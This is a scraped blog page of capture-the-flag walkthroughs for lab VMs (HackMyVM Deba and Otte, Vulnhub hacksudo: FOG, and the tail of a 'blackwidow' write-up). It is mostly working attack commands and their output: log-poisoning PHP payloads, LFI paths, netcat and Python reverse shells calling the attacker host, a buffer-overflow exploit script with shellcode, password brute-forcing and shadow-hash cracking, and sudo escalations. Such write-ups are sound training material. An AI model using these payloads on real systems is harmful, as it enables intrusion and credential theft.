 192.168.56.150 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
 192.168.56.150 - - [25/May/2021:04:24:49 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"

Set user agent to php shell code, and check if it works.

 curl -A '<?php system($_GET[c]); ?>' http://192.168.56.100        
 <html>
 <img src="wallpaper.jpg" alt="wallpaper" width="100%" height="100%">
 </html>

 ~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=id'
 192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
 "
 192.168.56.150 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 251 "-" "curl/7.74.0"

In order to get a reverse shell, I tried many ways, at last used the following method. Run a temporary http server locally, with a php shell named "r" at root folder.

 sudo php -S 0.0.0.0:80
 [Tue May 25 19:53:10 2021] PHP 7.4.15 Development Server (http://0.0.0.0:80) started
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Accepted
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 [200]: (null) /r
 [Tue May 25 19:54:43 2021] 192.168.56.100:39630 Closing

On VM, use curl to get reverse shell php named "r" and renamed it to "r.php".

 curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=curl%20http://192.168.56.150/r%20-o%20r.php'

Visit the php shell.

 curl http://192.168.56.100/company/r.php

Then we get reverse shell.

 nc -nlvp 1234                                                                      sudo-0 | 0 [19:54:47]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:48366.
 Linux blackwidow 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
  05:01:50 up 37 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Found a strange string in /var/backups/auth.log, which is viper's password. (I think this step is the most hard.)

 Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109  user=viper
 Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
 Dec 12 16:56:44 test sshd[29560]: pam_unix(sshd:auth): check pass; user unknown

Check bash history of viper.

 viper@blackwidow:~$ cat .bash_history
 ...
 arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 ls                                                  
 ./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 su root

Search file named arsenic.

 viper@blackwidow:~$ find / -name arsenic 2>/dev/null
 /home/viper/backup_site/assets/vendor/weapon/arsenic

Su root.

 viper@blackwidow:~$ /home/viper/backup_site/assets/vendor/weapon/arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
 # id                                                
 uid=0(root) gid=1001(viper) groups=1001(viper)

HackMyVm Deba Walkthrough

发表评论

HackMyVm Deba Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Deba

Scan ports, found 22, 80 and 3000 are open.

 # Nmap 7.91 scan initiated Fri May 14 08:30:51 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.0012s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)
 |   256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)
 |_  256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 3000/tcp open  http    Node.js Express framework
 |_http-title: Site doesn't have a title (text/html; charset=utf-8).

Scan port 80, found nothing. Check port 3000, looks like a node.js site.

[image-20210524174309208.png]

Use the classic Node.JS - 'node-serialize' Remote Code Execution POC at: https://www.exploit-db.com/exploits/49552.

Get reverse shell as www-data. Check sudo.

 www-data@debian:/home/low$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on debian:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on debian:
     (ALL : low) NOPASSWD: /usr/bin/python3 /home/low/scripts/script.py

Check files and content of /home/low/scripts, we have write permission of main.py.

 www-data@debian:/home/low/scripts$ ls -la
 ls -la
 total 16
 drwxr-xr-x 2 low      low      4096 may  7 17:59 .
 drwxr-xr-x 8 low      low      4096 may  7 23:45 ..
 -rwxr-xr-x 1 www-data www-data   88 may  7 10:57 main.py
 -rw-r--r-- 1 low      low        80 may  7 10:44 script.py

 www-data@debian:/home/low/scripts$ cat script.py
 cat script.py
 import main
 import os
 print("\n")
 os.system("ip a | grep enp0s3")
 print("\n")

 www-data@debian:/home/low/scripts$ cat main.py
 cat main.py
 from os import system as main
 print("\n")
 print("Just main")
 main("whoami")
 print("\n")

Modify main.py to get shell as user low.

 echo 'import os;os.system("/bin/bash");' > main.py
 sudo -u low python3 /home/low/scripts/script.py
 low@debian:~/scripts$ id
 id
 uid=1001(low) gid=1001(low) grupos=1001(low)

Upload id_rsa.pub to get ssh access as user low.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys
 chmod 600 authorized_keys

After login as low, check pspy64. The user debian with id 1000 will run /home/debian/Documentos/backup/dissapeared.py each minute.

 2021/05/14 05:31:02 CMD: UID=0    PID=2240   | /usr/sbin/CRON -f
 2021/05/14 05:31:02 CMD: UID=1000 PID=2241   | /usr/bin/python3 /home/debian/Documentos/backup/dissapeared.py

Create the file and write shell code in it.

 low@debian:/home/debian/Documentos/backup$ echo 'import os;os.system("nc 192.168.56.150 2234 -e /bin/bash");' > dissapeared.py

Get reverse shell as user debain.

 nc -nlvp 2234      
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::2234
 Ncat: Listening on 0.0.0.0:2234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:45812.
 id
 uid=1000(debian) gid=1000(debian) grupos=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),114(lpadmin),115(scanner)

Spwan an interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'

Here, we can upload id_rsa.pub again, to get ssh login.

Check sudo again.

 debian@debian:~$ sudo -l
 Matching Defaults entries for debian on debian:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User debian may run the following commands on debian:
     (ALL : root) NOPASSWD: /bin/wine /opt/Buffer-Overflow-Vulnerable-app/brainfuck.exe

Run brainfuck.exe, it will open port 9999 and receive user input.

image-20210524180541022.png

Dissassemble brainfuck.exe, the vulnerability is at get_reply function.

 int __cdecl get_reply(char *Source)
 {
   size_t v1; // eax
   char Destination[520]; // [esp+10h] [ebp-208h] BYREF

   printf("[get_reply] s = [%s]\n", Source);
   strcpy(Destination, Source);
   v1 = strlen(Destination);
   printf("[get_reply] copied %d bytes to buffer\n", v1);
   return strcmp(Destination, "shitstorm\n");
 }

The max length of user input string is 520, then 4 bytes for ebp, 4 bytes for return address. We can generate test string.

 python3 -c "print('a'*520+'bbbb'+'cccc')"                                                                                                                                                                                  python3-0 | 1 [17:17:10]
 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccc

Test it on windows, debug it with ollydbg, the return address is JUST overwrited by 'cccc'.

[image-20210524172438560.png]

Brainfuck.exe also has jmp esp instruction.

 ropper --file brainfuck.exe --search 'jmp esp'                                                                                                                                                                         fish-0 | 0 [17:21:23]
 [INFO] Load gadgets for section: .text
 [LOAD] loading... 100%
 [LOAD] removing double gadgets... 100%
 [INFO] Searching for gadgets: jmp esp

 [INFO] File: brainfuck.exe
 0x311712f3: jmp esp;

Then we can make pwn code with class shell code.

 #!/usr/bin/python3
 import socket
 target_ip='192.168.56.100'
 target_port=9999
 recv_buf=4096
 junk = b'a' *520+b'bbbb'
 ret_addr=b'\xf3\x12\x17\x31'
 #the classic shellcode
 shell_code = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80'
 payload = b''
 payload += junk
 payload += ret_addr
 payload +=shell_code
 with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as clientSock:
     clientSock.connect((target_ip,target_port))
     data_from_srv = clientSock.recv(recv_buf)
     print(f"Reply --> {data_from_srv}")
     print(f"Sending --> {payload}")
     clientSock.sendall(payload)

Start brainfuck.exe with sudo, run exp.py at local machine, then we can get root shell.

HackMyVm Otte Walkthrough

发表评论

HackMyVm Otte Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Otte

Scan ports first.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for 192.168.56.100 (192.168.56.100)
 Host is up (0.00099s latency).
 Not shown: 65532 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_-rw-r--r--   1 ftp      ftp            89 May 15 12:25 note.txt
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 e8:38:58:1b:75:c5:53:47:32:10:d4:12:79:69:c8:ad (RSA)
 |   256 35:92:34:4e:cd:65:c6:08:20:76:35:ba:d9:09:64:65 (ECDSA)
 |_  256 a2:87:9f:60:a4:0d:c5:43:6a:4f:02:79:56:ff:6e:d9 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38
 | http-auth:
 | HTTP/1.1 401 Unauthorized\x0D
 |_  Basic realm=Siemens - Root authentification
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: 401 Unauthorized
 Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visit ftp anonymous, get note.txt.

 cat note.txt
 Hi thomas ! I put on you personal folder the php code you asked me !

 See you later +++

Visit port 80, need authentication.

[image-20210523214949625.png]

Following the hint, search default credentials of siemens router. (This step is hard for me because I never used siemens router)

https://www.192-168-1-1-ip.co/router/siemens/siemens/17622/

After some failure, we get the correct credentials.

root zP2wxY4uE

Then we can scan folder and files.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log -U root -P zP2wxY4uE

 /index.php            (Status: 200) [Size: 28]
 /image                (Status: 200) [Size: 47076]
 /config.php           (Status: 200) [Size: 0]
 /thinkgeek.php        (Status: 200) [Size: 28]

Fuzz thinkgeek.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?FUZZ=id' -w /usr/share/seclists/Discovery/Web-Content/big.txt --basic root:zP2wxY4uE --hh 28

 000007535:   200        0 L      0 W        0 Ch        "file"

Try LFI.

 curl -u  root:zP2wxY4uE 'http://192.168.56.100/thinkgeek.php?file=../../../../etc/passwd'

 root:x:0:0:root:/root:/bin/bash
 ...
 thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
 ...
 laetitia:x:1001:1001:,,,:/home/laetitia:/bin/bash
 cedric:x:1002:1002:,,,:/home/cedric:/bin/bash

Follow the hint of note.txt, fuzz /home/thomas/*.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/FUZZ.php' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 0

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload      
 =====================================================================

 000016344:   200        2 L      3 W        20 Ch       "shell"

Fuzz the parameter of shell.php.

 wfuzz -u 'http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&FUZZ=id' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt  --basic root:zP2wxY4uE --hh 20

 =====================================================================
 ID           Response   Lines    Word       Chars       Payload  
 =====================================================================

 000004959:   200        3 L      6 W        74 Ch       "command"

Visit shell.php, run reverse shell code.

http://192.168.56.100/thinkgeek.php?file=../../../../home/thomas/shell.php&command=nc%20192.168.56.150%201234%20-e%20/bin/bash

In another terminal, listen to port 1234, and get reverse shell.

 ~ nc -nlvp 1234    
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59386.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to interactive shell.

 python3 -c 'import pty;pty.spawn("/bin/bash")'
 www-data@otte:/var/www/html$

In /home/thomas, get nightmare.txt.

 www-data@otte:/home/thomas$ ls -la
 ls -la
 total 100
 drwxr-xr-x 4 thomas thomas  4096 May 20 09:46 .
 drwxr-xr-x 5 root   root    4096 May 16 12:34 ..
 -rw------- 1 thomas thomas    50 May 20 09:46 .Xauthority
 lrwxrwxrwx 1 thomas thomas     9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r-- 1 thomas thomas   220 May 15 12:12 .bash_logout
 -rw-r--r-- 1 thomas thomas  3526 May 17 14:42 .bashrc
 drwxr-xr-x 3 thomas thomas  4096 May 15 14:00 .local
 -rw-r--r-- 1 thomas thomas   807 May 15 12:12 .profile
 drwx------ 2 thomas thomas  4096 May 17 09:35 .ssh
 -rw-r--r-- 1 thomas thomas 61258 May 15 14:44 important_file
 -rw-r--r-- 1 thomas thomas   122 May 15 14:56 nightmare.txt
 -rwxr-xr-x 1 thomas thomas    93 May 17 09:15 shell.php
 www-data@otte:/home/thomas$ cat nightmare.txt
 cat nightmare.txt
 who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
 www-data@otte:/home/thomas$

Download important_file to local machine, check file content, the header is corrupted.

 less important_file
 important_file  (press RETURN)
 00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....

...

Search IDHR on google, looks like it's an PNG file. Replace XXXX's with a normal PNG file header.

 head important_file  
 00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....
 00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8  x..16&.....G>_..
 00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f  ......5.g.w=0.|.

Use cyberchef to render the PNG file, get a QR code.

[image-20210523212230214.png]

Render the QR code, get an link.

[image-20210523212429143.png]

Visit https://eqrcode.co/a/SVxQdM, get password of thomas.

Login ssh as thomas, check sudo.

 thomas@otte:/home/laetitia$ sudo -l
 Matching Defaults entries for thomas on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User thomas may run the following commands on otte:
     (laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *

Run simpler.py, when ask for IP, input shell command.

 thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
 ***********************************************
      _                 _
  ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
 / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
 \__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
 |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                 |_|               |_|    |___/
                                 @ironhackers.es

 ***********************************************

 Enter an IP: $("/bin/bash")
 laetitia@otte:~$

This shell is not interactive, we need to run 'nc x.x.x.x xxxx -e /bin/bash' to get another reverse shell, which is interactive.

[image-20210523220810457.png]

Check sudo again, as laetitia.

 laetitia@otte:~$ sudo -l
 sudo -l
 Matching Defaults entries for laetitia on otte:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User laetitia may run the following commands on otte:
     (cedric) NOPASSWD: /usr/bin/w3m

Use php to create a temporary http server on local machine, use w3m visit port 80, and spawn a shell.

 sudo -u cedric /usr/bin/w3m http://192.168.56.150

Then run !/bin/bash, now we are user cedric.

[image-20210523221401950.png]

In /home/cedric/.ssh, upload id_rsa.pub.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys

Then we can login ssh as cedric.

Check sudo again.

 cedric@otte:~$ sudo -l
 Matching Defaults entries for cedric on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cedric may run the following commands on otte:
     (ALL : ALL) NOPASSWD: /usr/bin/mmwatch

After check code of mmwatch, we can read id_rsa of root through mmwatch.

 sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"

Then we can login ssh as root.

 root@otte:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 otte
 root@otte:~# ls -la /root
 total 40
 drwx------  4 root root 4096 May 20 10:30 .
 drwxr-xr-x 18 root root 4096 May 15 12:07 ..
 lrwxrwxrwx  1 root root    9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
 drwxr-xr-x  3 root root 4096 May 15 12:13 .local
 -rw-------  1 root root 1500 May 15 13:23 .mysql_history
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 -rwx------  1 root root   33 May 16 14:02 root.txt
 drwx------  2 root root 4096 May 16 13:24 .ssh
 -rw-r--r--  1 root root  173 May 15 12:19 .wget-hsts
 -rw-------  1 root root  100 May 20 10:30 .Xauthority

Vulnhub hacksudo: FOG Walkthrough

发表评论

Vulnhub hacksudo: FOG Walkthrough

https://www.vulnhub.com/entry/hacksudo-fog,697/

Scan open ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100

 PORT      STATE SERVICE   VERSION                                               21/tcp    open  ftp       Pure-FTPd
 22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 111/tcp   open  rpcbind   2-4 (RPC #100000)
 443/tcp   open  ssl/https Apache/2.4.38 (Debian)
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 2049/tcp  open  nfs_acl   3 (RPC #100227)
 3306/tcp  open  mysql     MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
 ...
 43195/tcp open  mountd    1-3 (RPC #100005)
 45469/tcp open  nlockmgr  1-4 (RPC #100021)
 48871/tcp open  mountd    1-3 (RPC #100005)
 52195/tcp open  mountd    1-3 (RPC #100005)

Scan folders/files of port 80, download dict.txt.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.php            (Status: 302) [Size: 0] [--> /fog/index.php]
 /index.html           (Status: 200) [Size: 853]
 /index1.html          (Status: 200) [Size: 329]
 /cms                  (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
 /dict.txt             (Status: 200) [Size: 1798]
 /fog                  (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]

Found username hacksudo at cms page.

[image-20210518224756405.png]

Bruteforce ftp.

 hydra -l hacksudo -P dict.txt  -t 32 192.168.56.100 ftp -f
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: hacksudo   password: hackme
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found

Download secr3tSteg.zip.

 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 43827
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 33         33                389 May  7 03:34 flag1.txt
 drwxr-xr-x    2 0          0                4096 May  6 13:57 hacksudo_ISRO_bak
 226-Options: -a -l
 226 4 matches total
 ftp> cd hacksudo_ISRO_bak
 250 OK. Current directory is /hacksudo_ISRO_bak
 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 46515
 drwxr-xr-x    2 0          0                4096 May  6 13:57 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 0          0                  63 May  5 11:07 authors.txt
 -rw-r--r--    1 0          0                   0 May  6 11:36 installfog
 -rw-r--r--    1 0          0             1573833 May  6 19:24 secr3tSteg.zip

Bruteforce password of zip.

 fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip    
 PASSWORD FOUND!!!!: pw == fooled

Download the SoundStegno provided at source code of index1.html.

[image-20210519103824772.png]

Decrypt the wav file unzipped from secr3tSteg.zip, get hints.

 python3 /opt/SoundStegno/ExWave.py  -f ./hacksudoSTEGNO.wav  
 ...
 Visit for more tutorials : www.youtube.com/techchipnet
 Hide your text message in wave audio file like MR.ROBOT
 Please wait...
 Your Secret Message is: Shift by 3
 ABCDEFGHIJKLMNOPQRSTUVWXYZ
 DEFGHIJKLMNOPQRSTUVWXYZABC
 zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR

Decrypt Caesar message at http://rumkin.com/tools/cipher/caesar-keyed.php.

[image-20210518224455131.png]

Login cms with hacksudo:hacksudoISRO. Found cmsmsrce.txt.

[image-20210518224924381.png]

Check content of the txt file.

[image-20210519104218050.png]

Copy cmsmsrce.txt to shell.php, visit the following address in browser.

http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

At the same time, listen at port 1234 in another terminal, get reverse shell.

[image-20210519104609411.png]

Find suid files.

 find / -perm -u=s 2>/dev/null
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/sbin/mount.nfs
 /usr/bin/gpasswd
 /usr/bin/umount
 /usr/bin/sudo
 /usr/bin/chfn
 /usr/bin/look
 /usr/bin/mount
 /usr/bin/chsh
 /usr/bin/newgrp
 /usr/bin/su
 /usr/bin/passwd

Use look to read /etc/shadow.

 www-data@hacksudo:/home$ look '' /etc/shadow
 look '' /etc/shadow
 root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
 ...
 isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
 dnsmasq:*:18756:0:99999:7:::

Crack password of isro.

  john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt                                fish-0 | 0 [23:32:44]
 Using default input encoding: UTF-8
 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
 Cost 1 (iteration count) is 5000 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 qwerty           (isro)

Log in ssh as user isro. Check sudo, but it's rabbit hole.

 ssh isro@192.168.56.100
 isro@192.168.56.100's password:
 Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
 isro@hacksudo:~$ sudo -l
 [sudo] password for isro:
 Matching Defaults entries for isro on hacksudo:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User isro may run the following commands on hacksudo:
     (root) /usr/bin/ls /home/isro/*
 isro@hacksudo:~$

In /home/isro/fog, found a executable file of user root.

 isro@hacksudo:~$ ls -la
 total 40
 drwxr-x--- 5 isro isro 4096 May 18 12:16 .
 drwxr-xr-x 6 root root 4096 May  8 12:25 ..
 -rw------- 1 root isro   41 May 18 11:44 .bash_history
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .bash_logout
 -rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
 drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
 drwx------ 3 isro isro 4096 May  5 14:09 .gnupg
 drwxr-xr-x 3 isro isro 4096 May  5 14:11 .local
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .profile
 -r-------- 1 isro isro   33 May  6 14:31 user.txt
 -rw------- 1 isro isro   54 May 18 12:16 .Xauthority
 isro@hacksudo:~$ cd fog
 isro@hacksudo:~/fog$ ls -la
 total 3700
 drwxr-xr-x 2 isro isro    4096 May 13 05:06 .
 drwxr-x--- 5 isro isro    4096 May 18 12:16 ..
 -rwxr-xr-x 1 root isro   16712 May 12 13:46 fog
 -rw-r--r-- 1 isro isro       0 May  6 14:30 get
 -rwxr-xr-x 1 isro isro   69368 May  6 14:29 ping
 -rwxr-xr-x 1 isro isro 3689352 May  6 14:30 python

Run fog, get python shell, check id, it's root.

 isro@hacksudo:~/fog$ ./fog
 Python 2.7.16 (default, Oct 10 2019, 22:02:15)
 [GCC 8.3.0] on linux2
 Type "help", "copyright", "credits" or "license" for more information.
 >>> import os;os.system("id");
 uid=0(root) gid=1003(isro) groups=1003(isro)
 0

Spawn a root shell.

 >>> import pty;pty.spawn("/bin/bash");
 ┌──(root💀hacksudo)-[~/fog]
 └─# id;hostname
 uid=0(root) gid=1003(isro) groups=1003(isro)
 hacksudo
 ┌──(root💀hacksudo)-[~/fog]
 └─# c
